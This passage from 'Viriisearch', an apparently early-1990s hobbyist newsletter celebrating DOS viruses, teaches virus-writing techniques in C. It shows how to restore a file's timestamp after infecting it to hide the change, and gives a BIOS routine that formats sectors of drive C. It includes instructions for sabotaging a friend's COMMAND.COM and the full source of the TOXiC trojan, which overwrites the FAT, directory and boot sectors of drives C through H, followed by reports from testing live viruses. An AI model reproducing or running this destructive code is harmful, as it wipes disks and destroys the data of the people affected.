- If you were wondering where to get the hexadecimal values for setting the
- date and time, you can do it this way:
-
- -----------------------------------------------------------------------------
-
- #include <fcntl.h>
- #include <time.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <dos.h>
- int fh;
- char filename[13] = {"*.*"};
- FILE *stream;
- unsigned date;
- unsigned mtime;
- int main(void);
- main()
- {
- struct stat buf;
- struct find_t all_file;
-
- stream=fopen("HEXTABLE.TXT","a");
- _dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file);
- _dos_open(all_file.name,O_RDONLY,&fh);
- _dos_getftime(fh,&date,&mtime);
- fstat(fh,&buf);
- _dos_close(fh);
- fprintf(stream,"-----------------------------------------------------------------------------\n");
- fprintf(stream," Hexadecimal:\t\t| Regular:\n");
- fprintf(stream,"-----------------------------------------------------------------------------\n");
- fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime));
- while (_dos_findnext(&all_file) == 0) {
- _dos_open(all_file.name,O_RDONLY,&fh);
- _dos_getftime(fh,&date,&mtime);
- fstat(fh,&buf);
- _dos_close(fh);
- fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime));
- }
- fclose(stream);
- }
-
- -----------------------------------------------------------------------------
-
- This is actually very simple. It uses the file finding methods used in ATTRB
- v3.0, discussed earlier, with one difference: It doesn't take a command line
- parameter like ATTRB did...instead the filespec is declared in the code as a
- character array:
-
- char filename[13] = {"*.*"};
-
- In this case, it finds ALL the files, using wildcards. You can change it to
- find any file(s) you want, for instance:
-
- char filename[13] = {"*.COM"};
-
- Would find all the files that have a extension of .COM
-
- The curly braces { and } surrounding the filespec are neccessary when
- initializing a array.
-
- This is the structure for returning the date and time on the file:
-
- struct stat buf;
-
- And this is the structure for finding the files:
-
- struct find_t all_file;
-
- Here it opens the "HEXTABLE.TXT" file. Note the "a" switch, which means
- "append" if the file exists, it will write to the end of the file. If it
- doesn't exist, it will create it.
-
- stream=fopen("HEXTABLE.TXT","a");
-
- Here it starts the search. It attempts to locate the first file matching:
-
- char filename[13] = {"*.*"};
-
- and passes the filename found to the "all_file" structure
-
- _dos_findfirst(filename, _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file);
-
- Here _dos_open opens the file, and passes the file handle to the integer "fh"
-
- _dos_open(all_file.name,O_RDONLY,&fh);
-
- And here it gets the file date and time, storing it in the two unsigned
- integers "date" and "mtime"
-
- NOTE: I originall called had used "time" instead of "mtime" and it wouldn't
- compile and link the file because "time" is a function in the standard
- library that came with the compiler. Told ya I'm still learning!
-
- BTW, the screw up with 'time' was Microsoft's fault. That's what they used in
- the manual.
-
- _dos_getftime(fh,&date,&mtime);
-
- Here it gets the stats on the file as outlined in the stat structure.
-
- fstat(fh,&buf);
-
- Then it close the file that the integer "fh" points to.
-
- _dos_close(fh);
-
- and prints the following lines to the file "HEXTABLE.TXT"
-
- fprintf(stream,"-----------------------------------------------------------------------------\n");
- fprintf(stream," Hexadecimal:\t\t| Regular:\n");
- fprintf(stream,"-----------------------------------------------------------------------------\n");
- fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime));
-
- \t is a TAB, %s is a string, and %x is a hexadecimal value.
-
- It prints date and mtime as hex values, and prints the regular date and time
- as a string with the help of the "ctime" function.
-
- And the following code basically does the same thing until there are no more
- files matching "all_file.name"
-
- while (_dos_findnext(&all_file) == 0) {
- _dos_open(all_file.name,O_RDONLY,&fh);
- _dos_getftime(fh,&date,&mtime);
- fstat(fh,&buf);
- _dos_close(fh);
- fprintf(stream," %x %x\t\t| %s",date,mtime,ctime(&buf.st_atime));
- }
-
- then it close "HEXTABLE.TXT" and exits.
-
- fclose(stream);
- }
-
- *****************************************************************************
-
- Following is part of "HEXTABLE.TXT" after I ran the above program so you can
- see some examples of hexadecimal date and time values and the regular date
- and time next to them:
-
- NOTE: The first hexadecimal value is the date, the second one is the time.
-
- *****************************************************************************
-
- -----------------------------------------------------------------------------
- Hexadecimal: | Regular:
- -----------------------------------------------------------------------------
- 1067 2820 | Mon Mar 07 05:01:00 1988
- 1896 4bd1 | Wed Apr 22 09:30:34 1992
- 106a 5a2c | Thu Mar 10 11:17:24 1988
- 1067 2820 | Mon Mar 07 05:01:00 1988
- 1067 2820 | Mon Mar 07 05:01:00 1988
- 1689 2800 | Tue Apr 09 05:00:00 1991
- 1896 4a5c | Wed Apr 22 09:18:56 1992
- 1896 4a5c | Wed Apr 22 09:18:56 1992
- 1067 2820 | Mon Mar 07 05:01:00 1988
- 1067 2820 | Mon Mar 07 05:01:00 1988
-
- *****************************************************************************
-
- You will notice in the previous program that set the file date and time, I
- had it like this:
-
- unsigned date=0x421;
- unsigned time=0xC0F;
-
- Now, in the above hex values, 1067 is 03/07/88 and 2820 is 5:01am, so you
- would put:
-
- unsigned date=1067;
- unsigned time=2820;
-
- right? WRONG. You have to put the 0x in front of it:
-
- unsigned date=0x1067;
- unsigned time=0x2820;
-
- This is only required if you are going to declare and initialize two integers
- with a value such as I did here:
- -----------------------------------------------------------------------------
- #include <fcntl.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <dos.h>
- int fh=0;
- unsigned date=0x421;
- unsigned time=0xC0F;
- int main(void);
- main()
- {
- _dos_open("TEST.TXT",O_RDONLY,&fh);
- _dos_setftime(fh,date,time);
- _dos_close(fh);
- }
- -----------------------------------------------------------------------------
- However, when getting the time and date using _dos_getftime and setting it
- using _dos_setftime, the 0x is not neccessary even though _dos_getftime does
- return the values without the 0x because _dos_setftime knows what they are
- and does set the date and time according to what the two values are.
- -----------------------------------------------------------------------------
-
- Now, the final product on getting/setting file dates/times:
-
- -----------------------------------------------------------------------------
-
- #include <fcntl.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <dos.h>
- int fh;
- int main (void);
- main()
- {
- unsigned date;
- unsigned mtime;
- _dos_open("EXAMPLE.EXE",O_RDWR,&fh); /* open file */
- _dos_getftime(fh,&date,&mtime); /* get file date and time */
- /* Virus can infect "EXAMPLE.EXE" here */
- /* and then restore the original date and time */
- _dos_setftime(fh,date,mtime);
- _dos_close(fh); /* close "EXAMPLE.EXE" */
- }
-
- -----------------------------------------------------------------------------
-
- Formatting:
-
- -----------------------------------------------------------------------------
-
- #include <bios.h>
- int main(void);
- main()
- {
- struct diskinfo_t disk_info;
-
- disk_info.drive =2;
- disk_info.head =1;
- disk_info.track =1;
- disk_info.sector =1;
- disk_info.nsectors =10;
-
- _bios_disk(_DISK_FORMAT,&disk_info);
- }
-
- -----------------------------------------------------------------------------
-
- The above example will format 10 sectors of track 1, starting at sector 1 on
- head 1 of drive C.
-
- -----------------------------------------------------------------------------
-
- disk_info.drive =2;
- disk_info.head =1;
- disk_info.track =1;
- disk_info.sector =1;
- disk_info.nsectors =10;
-
- -----------------------------------------------------------------------------
- disk_info.drive=2 is drive C.
-
- 0 is drive A, and 1 is drive B.
-
- disk_info.head=1 is head 1.
-
- disk_info.track=1 is the track to start formatting at.
-
- disk_info.sector=1 is the sector to start formatting at.
-
- disk_info.nsectors=10 is the total number of sectors to format.
- -----------------------------------------------------------------------------
-
- Fun with COMMAND.COM
-
- -----------------------------------------------------------------------------
-
- OK, I did this to a friend of mine, and it resulted in about two hours of
- major frustration before I finally called him and told him what I did. What
- we do is change all the internal MS-DOS commands inside COMMAND.COM...once
- you do that, replace someone's COMMAND.COM on their hard drive and re-boot
- their machine. What will happen is whenever they type a internal command such
- as CLS, COPY, MD, DIR, etc, it will say: Bad Command Or Filename.
-
- This is how it is done:
-
- Run a sector editor such as: Norton Utilitie's DISKEDIT
-
- Commands:
-
- Alt (O)bject and then (F)ile OR Alt-F by itself. Then select COMMAND.COM as
- the file, it will then open it. Then: Alt (T)ools, (F)ind OR CTRL-S. Then type
- in the string to search for (CLS, DIR, COPY, etc), once it finds it, do the
- following:
-
- Alt (E)dit, (M)ark OR CTRL-B
-
- Then simply type over the command with something else and hit CTRL-W which
- will write those changes to the file.
-
- Just do this with every internal command and there you go.
-
- Note: If there is a string of text in COMMAND.COM such as: "Copy is used to
- move files from drive to drive or directory to directory", when you search
- for COPY it will find the Copy at the beginning of that string, you don't want
- to change that. Just hit CTRL-G (Find again) to find the next occurence of
- COPY.....The one you are looking for will be in all CAPS and surrounded by
- nothing else but unreadable characters.
-
- -----------------------------------------------------------------------------
-
- Sample Source Code Of Virii: TOXiC Trojan #1
-
- -----------------------------------------------------------------------------
-
- This is what the author of the "TOXiC Trojan #1" has to say about his
- creation:
-
- -----------------------------------------------------------------------------
- TOXiC1 - TOXiC Trojan #1 - Programmed by Izzy Stradlin' and MiSERY/CPA
- MiSERY1 is the name given to this trojan. I programmed it, I name the
- Mother fucker. I hereby give all rights of this trojan to MiSERY/CPA.
- If ya don't like it, TOUGH. I Give ALL rights EXCEPT for the NAME to
- CPA - eg. NOONE CAN CHANGE THE NAME OF THIS THING W/O MY PERMISSION AND
- LEAVE MY NAME IN IT. The name must stay on, both my name and the name
- of the trojan are copyrighted (c) 90 to Izzy Stradlin'
- -----------------------------------------------------------------------
- Capt. - This isn't a Real Virus - It's a Trojan. Sorry, still trying
- to use something similar to ASM's int 21h; for DOSs features, then I'll
- Get going on Virii. As is, this Destroys Boot/Fat/Dir on Most harddisks
- and Well, there is so far no way that I know of that it can recover
- what the disk lost, as it writes the trojan name over everything. This
- SHOULD Go for BOTH FAT Tables, but I am not going to try it out. Haha.
- You try it - Tell me how it works! all I know is that it got 6 of my
- Flippin' floppies, damnit! - Delete this bottom message to you after
- Checking it out - Makes it look more professional. Leave the top text
- part in tact, just in case you want to pass it around.
- This is JUST A START. They DO/WILL Get better - this is weak, but as I
- Said - no known recovery from it.
- Oh, this looks for C: through H:
-
- -----------------------------------------------------------------------------
-
- And this is what I have to say about The "TOXiC Trojan #1"
-
- -----------------------------------------------------------------------------
-
- The author of the "TOXiC Trojan #1" says that this is a trojan, but to me it
- is NOT....if it was, it wouldn't be featured here as this is a newsletter
- dedicated entirely to virii. A trojan is a destructive program disguised as
- a real program that already exists, or disguised as a useful program. This
- program does not implement any encryption techniques, or stealth techniques
- so actually it is a toss up. I call it a virus, though. Anyway, the source
- code below is the original source code as written by Izzy Stradlin'
-
- -----------------------------------------------------------------------------
-
- #define TROJAN_NAME "TOXiC" /* Trojan Name */
-
- /* Procedures */
- void infect_fat();
- void infect_dir();
- void infect_boot();
- void main();
- /* Simple, eh? */
-
-
- void infect_fat()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,0,2,TROJAN_NAME);
- }
- }
-
- void infect_dir()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,2,2,TROJAN_NAME);
- }
- }
-
- void infect_boot()
- {
- int i;
- for (i=0; i<7; i++) {
- abswrite(i,4,2,TROJAN_NAME);
- }
- }
-
- void main()
- {
- printf(TROJAN_NAME);
- infect_fat();
- infect_dir();
- infect_boot();
- }
-
- -----------------------------------------------------------------------------
-
- Now, this is my modified source code to the "TOXiC Trojan #1"
-
- -----------------------------------------------------------------------------
-
- #define TROJAN_NAME "TOXiC"
- void infect_fat();
- void infect_dir();
- void infect_boot();
- int main(void);
- main()
- {
- printf(TROJAN_NAME);
- infect_fat();
- infect_dir();
- infect_boot();
- }
-
- void infect_fat()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,0,2,TROJAN_NAME);
- }
- }
-
- void infect_dir()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,2,2,TROJAN_NAME);
- }
- }
-
- void infect_boot()
- {
- int i;
- for (i=0; i<7; i++) {
- abswrite(i,4,2,TROJAN_NAME);
- }
- }
-
- -----------------------------------------------------------------------------
-
- You may ask why I modified his source code, well I did for a few reasons:
-
- He declared "main()" as:
-
- void main();
-
- When I first became familiar with the ANSI C standard, I declared "main()"
- like so:
-
- int main(void);
-
- which says that main() will return a value of type int but has no parameters
- passed to it. His way says that main will not return a value at all, and (I
- am assuming here) will not be called with any parameters because he left the
- parentheses empty. Using void and leaving the parentheses empty may very well
- have the same effect, although I am not sure. (I never said I knew everything)
-
- In his he put his procedures (below) before the main program.
-
- void infect_fat()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,0,2,TROJAN_NAME);
- }
- }
-
- void infect_dir()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,2,2,TROJAN_NAME);
- }
- }
-
- void infect_boot()
- {
- int i;
- for (i=0; i<7; i++) {
- abswrite(i,4,2,TROJAN_NAME);
- }
- }
-
- With mine, I placed the procedures after the main program. Once again I am
- not 100% sure that this would have any effect on your program, and whether or
- not it is a case of preference.
-
- His three procedures:
-
- infect_fat()
- infect_dir()
- infect_boot()
-
- are all declared to return no value (void) and called with no parameters, as
- he, once again, left the parentheses empty. (Which brings us back to main()..
- leaving the parentheses empty on main() must have the same effect as putting
- void in the parentheses)
-
- Now the discussion of his procedures:
-
- void infect_fat()
- {
- int i;
- for (i=2; i<7; i++) {
- abswrite(i,0,2,TROJAN_NAME);
- }
- }
-
- This procedure, "infect_fat" writes the name of the trojan (virus) over
- the file allocation table of drives C through H, providing they exist. This
- is how it works:
-
- the "for loop" uses the integer i, first assigning the value 2 to it, which
- is the number of drive C, and then it passes the integer to the function
- "abswrite" along with two other values, 0 and 2, and the name of the virus.
-
- The integer i, as we know, contains the drive number, 0 is the starting sector
- number, and 2 is the number of sectors to write. TROJAN_NAME is what gets
- written to that area of the disk. Every time it passes through the for loop,
- it increments the value of the integer i by 1 with the 'increment operator'
- (i++) and it stops once the value of i is equal to or greater than 7. i<7 is
- basically saying "while i is less than 7, keep going" Because the value of i
- is increased with each pass through the loop, it attempts to write drives C
- through H (2 being drive C, 3 being drive D, 4 being drive E, etc)
-
- The code in between the first { and the second } is what the procedure does.
- The code in between the second { and the first } is what takes place every
- time the procedure passes through the for loop.
-
- The other two procedures, infect_dir() and infect_boot(), basically work the
- same way infect_fat() does except they write to a different part of the disk.
-
- infect_dir() writes TROJAN_NAME on two sectors of drives C through H starting
- at sector 2.
-
- infect_boot() writes TROJAN_NAME on two sectors of drives C through H starting
- at sector 4.
-
- NOTE: abswrite() is not a function included with my standard runtime library
- but may be a part of other compiler's runtime libraries, or you could write
- one yourself.
-
- -----------------------------------------------------------------------------
-
- Suicidal Tendencies Dept:
-
- The virus of the month award goes to: 666-B Rock Steady Virus And The 15th
- Of April Virus.
-
- -----------------------------------------------------------------------------
-
- First I will start off with the 666-B Rock Steady Virus.
-
- The virus activates on the 13th of every month.
-
- I placed the file 666-B.COM on a floppy in drive B with the following files:
-
- COMMAND.COM - 47845 bytes
- PKUNZIP.EXE - 23528 bytes
-
- First I changed the system date to: 05-13-1992 and ran 666-B.COM
-
- It didn't do anything to the disk/files of drive B, instead it went to drive
- A which was a write protected Viriisearch <tm> disk. It gave me the following
- warning:
-
- This disk is not bootable
-
- If you wish to make it bootable,
- run the DOS program SYS after the
- system has been loaded
-
- Please insert a DOS diskette into
- the drive and strike any key...
-
- So I inserted a write protected DOS disk into the drive, and the machine
- booted. I decided to try a different approach:
-
- I once again changed the system date to: 05-13-1992 and once again ran
- 666-B.COM, but this time with a write protected DOS disk in drive A. It did
- the same thing again, ignored drive B, and went right for drive A, this time
- appearing to write to the disk for about 5-10 seconds, but it wasn't because
- the disk was write protected at the time. Then the machine re-booted. So again
- I tried another approach:
-
- I left the system date as what it was: 1-01-80 and then ran 666-B.COM, it did
- nothing but exit. Then I ran COMMAND.COM from the command line, no changes
- were made to it. Now, with the virus in memory, I again changed the system
- date to: 05-13-1992 and ran COMMAND.COM from the command line. This time it
- infected COMMAND.COM, increasing it's size to: 48511 bytes from 47845 bytes.
- I re-booted the machine, and looked back on drive B. PKUNZIP.EXE had also
- been infected without me running it, it's size being increased to 24194 bytes
- from 23528 bytes.
-
- Note: The virus also formats the hard drive Boot Area and FAT on the 13th of
- every month, but I do not have a hard drive so I did not witness this.
- This is a well written virus and I am sure it does that if Rock Steady
- says it does.
-
- -----------------------------------------------------------------------------
-
- Suicidal Tendencies Dept. Part II: The 15th Of April Virus
-
- -----------------------------------------------------------------------------
-
- I placed the following files on a floppy in drive B:
-
-
- ANSI SYS 9029 04-09-91 5:00a
- RAMDRIVE SYS 5873 04-09-91 5:00a
- CONFIG SYS 39 01-01-80 12:35a
- COMMAND COM 47845 04-09-91 5:00a
- SYS COM 13440 04-09-91 5:00a
- NDOS COM 2419 08-14-84 12:00p
- MEM EXE 39818 04-09-91 5:00a
- DEBUG EXE 21692 06-07-90 2:24a
- PKUNZIP EXE 23528 03-15-90 1:10a
-
- and then placed 15APR.COM on there with them.
-
- The system date was: 1-01-80 when I first ran 15APR.COM.
-
- I then ran MEM.EXE and it's size increased to 41068 bytes from 39818 bytes.
- I also ran PKUNZIP.EXE, it's size increased to 24778 bytes from 23528 bytes,
- and NDOS.COM, it's size increasing from 2419 bytes to 3669 bytes.
-
- I then changed the system date to the 15th Of April, 1992 and ran 15APR.COM
- once again, and it did nothing.
-
- I ran COMMAND.COM and the virus did nothing to it, it remained uninfected and
- it's size remained the same so I ran SYS.COM with no parameters and it did
- get infected, it's size increasing from 13440 bytes to 14690 bytes.
-
- In all cases of a file being infected, it's size increased by 1250 bytes.
-
- -----------------------------------------------------------------------------
-
- Final Notes:
-
- -----------------------------------------------------------------------------
-
- Special thanks to:
-
- -----------------------------------------------------------------------------
-
- Rock Steady - For Writing Such A Well Written Virus For Me To Screw Around
- With.
-
- All The Phalcon/Skism Members - For Letting Me On U.S.S.R. And Letting Me
- Take Dark Angel's Phunky Virus Writing
- Guide As Well As 40 HEX (Gotta Love It
- When You Guys Rag On The Anti-Viral PPL)
-
- Louis Cypher - For Letting Me On Lucid Dreams, And Doing Me That Favor.
-
- Cliff Burton - For Making TLITD The Viriisearch HQ.
-
- Patty, Mr. Dickburg, And Whoever Else - For Giving The Phalcon/Skism Guys
- Someone To Rag On.
-
- Count Zero And Magic Man: For Letting Me On ATDT Which Led To My Original
- Interest In Virii.
-
- Spaceman: For Making All Those Virii Available To Me.
-
- To All The Virus Authors - For Writing Them And Giving This Newsletter A
- Purpose, And Giving Me Something To Do While
- A Unemployment Victim Of This #$%*& Recession.
-
- Pink Floyd/Led Zeppelin/Rush/U2/Queen - For Giving Me Good Quality Music To
- Listen To While Writing This Virus
- Newsletter (R.I.P Freddy & Bonzo)
-
- And Hi To Darby Crash! Hope You're Doing Well Wherever You Are!
-
- -----------------------------------------------------------------------------
-
- Hey Everyone: Have a AWESOME 4th Of July! Don't Drink And Drive (At Least Not
- In MY Neighborhood!)
-
- I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
- entirely to computer virii.
-
-
- Until Next Time......Be Careful!!!
-
- * Criminal Minded <tm> *
-
- -----------------------------------------------------------------------------
-
-